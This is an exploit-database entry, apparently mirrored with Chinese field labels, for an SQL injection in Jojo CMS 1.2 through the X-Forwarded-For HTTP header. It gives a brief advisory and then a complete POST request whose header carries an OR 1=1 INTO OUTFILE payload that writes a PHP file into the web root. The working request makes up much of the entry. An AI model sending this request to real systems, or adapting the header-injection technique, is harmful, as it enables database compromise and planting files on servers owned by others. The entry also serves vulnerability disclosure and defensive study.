Jojo CMS – ‘x-forwarded-for’ HTTP header SQL Injection

  • 作者: High-Tech Bridge SA
    日期: 2013-05-15
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/38519/
  • source: https://www.securityfocus.com/bid/59934/info
    
    Jojo CMS is prone to an SQL-injection vulnerability because it fails to sanitize user-supplied input.
    
    A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
    
    Jojo CMS 1.2 is vulnerable; other versions may also be affected. 
    
    POST /articles/test/ HTTP/1.1
    X-Forwarded-For: ' OR 1=1 INTO OUTFILE '/var/www/file.php' -- 
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 88
    name=name&email=user%40mail.com&website=&anchortext=&comment=comment&submit=Post+Comment